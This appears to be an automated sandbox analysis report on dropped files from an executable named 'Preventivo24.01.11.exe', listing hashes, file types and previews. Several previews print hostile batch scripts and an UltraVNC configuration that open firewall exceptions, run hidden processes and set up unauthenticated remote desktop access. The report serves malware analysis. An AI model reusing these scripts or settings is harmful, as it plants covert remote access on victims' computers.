SHA-512:	1DFFE86732FF298C962C8D11223B659387E1B68C3C772917CA727BFCD25570D4462B196F6346BB462C36EF5B0B11EE3D1881CC4FE474D5138E193678E49E1769
Malicious:	false
Preview:	SessionID=67b17778-92aa-416d-a05a-1cba2753070a.1706008085311 Timestamp=2024-01-23T12:08:05:311+0100 ThreadID=7980 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=67b17778-92aa-416d-a05a-1cba2753070a.1706008085311 Timestamp=2024-01-23T12:08:05:312+0100 ThreadID=7980 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=67b17778-92aa-416d-a05a-1cba2753070a.1706008085311 Timestamp=2024-01-23T12:08:05:312+0100 ThreadID=7980 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=67b17778-92aa-416d-a05a-1cba2753070a.1706008085311 Timestamp=2024-01-23T12:08:05:313+0100 ThreadID=7980 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=67b17778-92aa-416d-a05a-1cba2753070a.1706008085311 Timestamp=2024-01-23T12:08:05:313+0100 ThreadID=7980 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.394093042384683
Encrypted:	false
SSDEEP:	768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGb7:H
MD5:	AB8B8C532366A44AA6DE564BE471158C
SHA1:	B8B0FC11D7B11456505D8931364AF1011D17CE3D
SHA-256:	267BF9197636C9AB04F9F3CCF791A3C810581EF0CFAA9FE893F3457BE71FA8F3
SHA-512:	CD0F6DDE9B49DC0EDD6ADB1B09471CF4F4979375DD50199D2D5CE878824646F7EBAB641CBF45345AE8120C43D646F98FAA766DCEA160A05A40E667C33B8A8A4D
Malicious:	false
Preview:	04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : *************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***********************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\17c198f6-dee4-4333-a45e-2d68a935f042.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\7b77236c-9ec4-4c37-b7fe-9f4cc6be4abd.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/xA7ouWLgGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVuWLgGZtwZGk3mlind9i4ufFXpAXkru
MD5:	A8E5C37206C98D1B655FF994A420FFB6
SHA1:	827237782AB5971EC205C3BCECCC7950BE9F84C3
SHA-256:	F1F755059AF7C2CBC36920337941AEFB18FBDB3CD14D3239CBBBCF0CB8F208EA
SHA-512:	12DE33EB7624458AEC44D83D4E2C09E626F8E54E177FC0C26EEBA232935F34FAAAEB71FBB025EB7C53BEA9933C46ADCE759C32516D1B80C03B6734C61D61CEB2
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\b3834f64-b555-4a46-82f6-4b7902bd13e5.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/n5ZwYIGNPzWL07o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tGZd:xZwZG5WLxB3mlind9i4ufFXpAXkrfUsb
MD5:	E78E4D1CA18BE28748F65C3A192DAFB2
SHA1:	78AD6025CB470EFB9ECA8FF1ED41F617372D1F9F
SHA-256:	F4B25F5C5BE48E151080D9CC24C8A4662CBB591A6B32037DB8D7ADE1828D8849
SHA-512:	E170C9BD3B6BB575244FCD380334D763C30352586F60824A67868EAE8E895BE0601D51670FCC304724BDF321CE8EF64881E606C9CF4C18C5817DFB5A679E44D6
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\cec28c92-d6c6-474c-8465-91d556131ed3.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\shi5398.tmp

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5038592
Entropy (8bit):	6.043058205786219
Encrypted:	false
SSDEEP:	49152:vVkDvLSkqdbEsuV+ebMh8w+/H8pF/bmlEyGjWvcP1xQ+X7TqVAMPLfQyim8kznsY:2Ll+Mn0WHl9VA2ic/
MD5:	11F7419009AF2874C4B0E4505D185D79
SHA1:	451D8D0470CEDB268619BA1E7AE78ADAE0EBA692
SHA-256:	AC24CCE72F82C3EBBE9E7E9B80004163B9EED54D30467ECE6157EE4061BEAC95
SHA-512:	1EABBBFDF579A93BBB055B973AA3321FC8DC8DA1A36FDE2BA9A4D58E5751DC106A4A1BBC4AD1F425C082702D6FBB821AA1078BC5ADC6B2AD1B5CE12A68058805
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.D!...!...!...(.V.C...5..."...5...&...5...)...!......5...:...5... ...5...R...5.:. ...5... ...Rich!...................PE..d...p............." .........D...............................................`M.....'.M...`A........................................@.H.L&....I......@K.H.....I..............@M.....`J:.p.......................(....%..............@.......$.H......................text...4B.......D.................. ..`.wpp_sf.....`.......H.............. ..`.rdata...L......N.................@..@.data...hD...PI......*I.............@....pdata........I......2I.............@..@.didat.......0K.......J.............@....rsrc...H....@K.......J.............@..@.reloc.......@M.. ....L.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\TempFolder\~.pdf

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PDF document, version 1.7, 1 pages
Category:	dropped
Size (bytes):	44763
Entropy (8bit):	7.691836262046289
Encrypted:	false
SSDEEP:	768:9paAbg8/yZjn2K/Cgrf7F0kTRelSLcBzWAMMwsOt+yn9:9Lyp2oLTk4ItWAMMO9
MD5:	E3B54910AAE9324A7D56E5B22044104E
SHA1:	F93D54BC3E20316DD9B596D4EB0FE22BD9F1D4D8
SHA-256:	01FA678A302763B83703F0449FC63309CF7677FC119D2755DEFAD6DEA9D25BCD
SHA-512:	0549192D6C52053BA1F1C9AFB38B2243EA8BE119DD0FBDE3D15BCBA073911B59669BEEFDFD0C8AADFCEAE44A4AF2C7B09C76EE1EC88C0E13F5406283019FCB6A
Malicious:	false
Preview:	%PDF-1.7.%.....3 0 obj.<<./Type /XObject./Subtype /Image./Width 825./Height 540./BitsPerComponent 8./ColorSpace /DeviceRGB./Filter /DCTDecode./DecodeParms <<./Quality 80.>>./Length 5 0 R.>>.stream......C.....................................%...#... , #&'))..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((........9.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....C...e...4...i........W........\T...........W.........2...}_.O.&..Q.9P\........W.........2...m_.O.&.,Q.9P\........W..............?...qF(.As....6...m_.O.&.........?...qF(.As....2...}_.O.&....

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47744
Entropy (8bit):	6.688410109072587
Encrypted:	false
SSDEEP:	768:523s2H65HQdvusvavk76GDN8YeGQEky64UyToJs+i:5VQV75NzHae
MD5:	E818AB67C68E3EE621A8888FBBF2F266
SHA1:	644D473097112A48338202A418911716AAC5B9D8
SHA-256:	FF9D8F7FC2C3F5D0AFAF6F76E87D41FEEABF54FACBE26DC59661A78830F32972
SHA-512:	B67F0A1AB49E57459AFA8FD4E4FFC18BC2A8B2D7803C34A952656113D175A145AB2C1ABDE25272442759EC148BE8A5A05D44A6CE89DD882329BA436534D53BE4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W.,.W.,.W.,''.-.W.,''.-.W.,''.-.W.,./.,.W.,.<.-.W.,.W.,.W.,.<.-.W.,g&.-.W.,g&.-.W.,g&.-.W.,Rich.W.,........PE..L....Z._...........!.....f...8.......=..............................................%.....@A........................ ...`.......................................h.......8...........................................................................text....d.......f.................. ..`.rdata...'.......(...j..............@..@.data...d...........................@....reloc..h...........................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.inf

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Windows setup INFormation
Category:	modified
Size (bytes):	3890
Entropy (8bit):	3.7119439709099047
Encrypted:	false
SSDEEP:	48:5oAqyb+l0sOIbxcfW2iIVOgUqGNnijzXLTRkYx:jAIVANniNx
MD5:	D3153DDC1A7EB32C396E59E0CD2ECA50
SHA1:	285BC785A8E9D76BA652A841A4331A1F6DFE9431
SHA-256:	F615C264E1A04A5A18C62C08CABB9EBE8F76D964B04A111169F76C9036F260DD
SHA-512:	AAD64BD3A90C41E35667AA9C7B017F4FDCF0705BD2B70F105193390E3C727A2E410DBA9764BC5343220E9A2A0880B830C81AF4973DECE92AB64B90E1DC77DDC6
Malicious:	false
Preview:	..;.....;. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...i.n.f.....;.........[.V.e.r.s.i.o.n.].....P.n.p.L.o.c.k.D.o.w.n.=.1.....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.....C.a.t.a.l.o.g.F.i.l.e.=.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...c.a.t.....D.r.i.v.e.r.V.e.r. .=. .1.0./.1.8./.2.0.2.0.,.1.7...6...4.2...4.9.9.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.M.a.n.u.f.a.c.t.u.r.e.r.N.a.m.e.%.=.S.t.a.n.d.a.r.d.,.N.T.x.8.6.........[.S.t.a.n.d.a.r.d...N.T.x.8.6.].....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .R.o.o.t.\.U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.....%.D.e.v.i.c.e.N.a.m.e.%.=.M.y.D.e.v.i.c.e._.I.n.s.t.a.l.l.,. .U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y.........[.S.o.u.r.c.e.D.i.s.k.s.F.i.l.e.s.].....U.V.n.c.V.i.r.t.u.a.l.D.i.s.p.l.a.y...d.l.l.=.1...

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\uvncvirtualdisplay.cat

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	data
Category:	dropped
Size (bytes):	8560
Entropy (8bit):	7.2886183166813785
Encrypted:	false
SSDEEP:	192:N0xTS0+qInYe+PjPN3KowgCuodZubhSZyEl8YsuUAwCNQw1e9:NeInYPLNaowNZvZyEPLwPws9
MD5:	B2957E97DD342E0C0C5B58CB4DF951E6
SHA1:	A21F84EB2217DA6AB5079BFEFADC29503A662F6E
SHA-256:	1105E05993AB4EA8EFD6475FFEB82091BA61387E2D4F531AE5C6097E9BF530D3
SHA-512:	093E1FC0C322DAD8C902D8B116B3D66EDA79C3A3B51A40358A202801E850728049D0702C1F03466E17A0F390EE6B79BBDA6B2B59D2151A28EA00054294BD6503
Malicious:	false
Preview:	0.!l..*.H........!]0.!Y...1.0...+......0.....+.....7......0...0...+.....7.......(..i.@..##6....201018150649Z0...+.....7.....0...0.......A.&r..{...(..R..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0....([....k.R.A.3..m..11..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0.... ....0DL....\MCT........=...ww..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ....0DL....\MCT........=...ww..0.... ...d.JZ..,.....v.d.J..i.l.6.`.1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0P..+.....7...1B0@...F.i.l.e........u.v.n.c.v.i.r.t.u.a.l.d.i.s.p.l.a.y...i.n.f...0U..+.....7...1G0E0...

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UltraVNC.ini

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	Generic INItialization configuration [admin]
Category:	dropped
Size (bytes):	1208
Entropy (8bit):	5.080950758931414
Encrypted:	false
SSDEEP:	24:fJhFXNTxYgMKM0USlAdo9g9iWFOWIaGEToIeXYMyd5Tgc8OjulnN:fJzr8gUUAdTZOW+ooBI9j0NOjS
MD5:	C5F11F117A37314A4DDAE8D4BFCA23B7
SHA1:	58D1DFE525248BF51847526388F8D68CD3E50EA6
SHA-256:	200A7BF46C84F3F71DACC5ECE63E87B9BEF981325DC76462076923F574E12C1D
SHA-512:	0E99FD926F0FAA0CC576C6FF509CF037FFB2596FD5CB3A8BC5B080ED7BECDF29526C5CCACD1B5EBE2E243E0ECFF8186F81A14F16D3FB3C0472F38A3F50897652
Malicious:	false
Preview:	[Permissions]..[admin]..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=1..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=No Plugin Detected..primary=1..secondary=1..SocketConnect=1..HTTPConnect=1..AutoPortSelect=1..InputsEnabled=1..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..EnableUnicodeInput=0..EnableWin8Helper=0..QuerySetting=2..QueryTimeout=10..QueryDisableTime=0..QueryAccept=0..LockSetting=0..UseRegistry=0..MSLogonRequired=0..NewMSLogon=0..DebugMode=2..Avilog=0..kickrdp=0..service_commandline=..DebugLevel=10..DisableTrayIcon=0..rdpmode=0..LoopbackOnly=0..AllowLoopback=1..AuthRequired=0..ConnectPriority=0..AuthHosts=..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..PortNumber=5900..HTTPPortNumber=5800..IdleInputTimeout=0..RemoveWallpaper=0..RemoveAero=0..QueryIfNoLogon=0..FileTransferTimeout=1..clearconsole=0..accept_reject_mesg=..KeepAliveInterval=5..[UltraVNC]..passwd=000000000000000000..passwd2=000000000000000000..[poll]..Turb

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1035
Entropy (8bit):	5.154375767864971
Encrypted:	false
SSDEEP:	24:nep9ZV2tXY7ur3C7TEPaV1k774kIg41k7z2GD:6oo7urwEiNUz26
MD5:	B9B8C2AD3F16DD1EE7518B5B4ED165B1
SHA1:	FC8D881BF7B13DF8E7BF31B6F811F53C44F8336D
SHA-256:	C2AB7B8701BDC36198A8F01791C8A3479EF3E8BCC6CCD3BD8C2F60DD9672E8E1
SHA-512:	8CF8E80D8A8DB779B40005D87EFDAB57042026C62D4182129FC247F091E0C51E854509F85575BF0418A97FCAE096AA093CFB9128CF411E1993486F07A3BD966B
Malicious:	false
Preview:	::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%9999 +1000..set /a numb=%random% %%9999 +1000..set /p numc=<IDD.txt..type C:\Games\cmd.txt\|cmd..start C:\Games\viewer.exe /HideWindow C:\Games\once.cmd .. ....:com ..for %%A in (C:\Games\cmmc.cmd) do if %%~zA gtr 7 start C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd..timeout /t

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1102
Entropy (8bit):	5.375478540906423
Encrypted:	false
SSDEEP:	24:np9ZV2tXY7ur3C7TEPaV1k774kIwoNEGMoNha9d0aR/vA+ZyZB:5oo7urwEieG75aRQ+Zs
MD5:	8AADF3A1016440B07F8F3152E5755A41
SHA1:	9B6FC4D8890FE08F427928A6ACCEF39F592FB271
SHA-256:	B3C509FC687793ED75F2792540EFBDAB88D65CA18570C28651DA737CAC6544B7
SHA-512:	40DA5935BFD778559B1EC982B3C3B928766E288BC00BE3C8A85C41B9942E2E66CC19C5CCB4F1105AC5C2DEA3EE44FF9F421895CFBF6DBB6B58AB1226C4C0A1BF
Malicious:	false
Preview:	Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:1=%%]=%%~nB"..rem start C:\Games\viewer /HideWindow Reg add "%k%\%%~nB" /V Category /t REG_DWORD /d 1 /f.. ) Else (.. Call Call Set GUID[%%i:1=%%]="%%%%GUID[%%i:1=%%]%%%%","%%C".. Set/A i+=1.. )..) ....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL....netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL....set RUN_C="taskhost.exe"..wmic process where (name=%RUN_C%) get commandline \| findstr /i %RUN_C%> NUL..if errorlevel 1 (..start C:\Games\taskhost.exe -autoreconnect ID:%numc% -connec

C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd

Download File

Process:	C:\Users\user\Desktop\Preventivo24.01.11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1221
Entropy (8bit):	5.351088398106411
Encrypted:	false
SSDEEP:	24:op9ZV2tXY7ur3C7TEPaV1k774kIg4P5W40aJfiyZr/vA+coq+Hoq+Hoq+e:coo7urwEi0LahVQ+cx+Hx+Hx+e
MD5:	76147E456F8F392405B1FBAC4F315A30
SHA1:	FC90A4B0428DF537ED3FEE1A1B2E25C3C2A07D5A
SHA-256:	D69E739F18BD24DB5CFD451FB2BDAB32B4EFEEF41145B75CB89C7DC56641852D
SHA-512:	470EE57AC19364CCF4CDD8019A168440822E3E2B2708A3C4B5A4C5C0A3090C1BFEC1248E6AB1B23F93B5434FED3C69210A2161A56747231C25972752493AFD7C
Malicious:	false
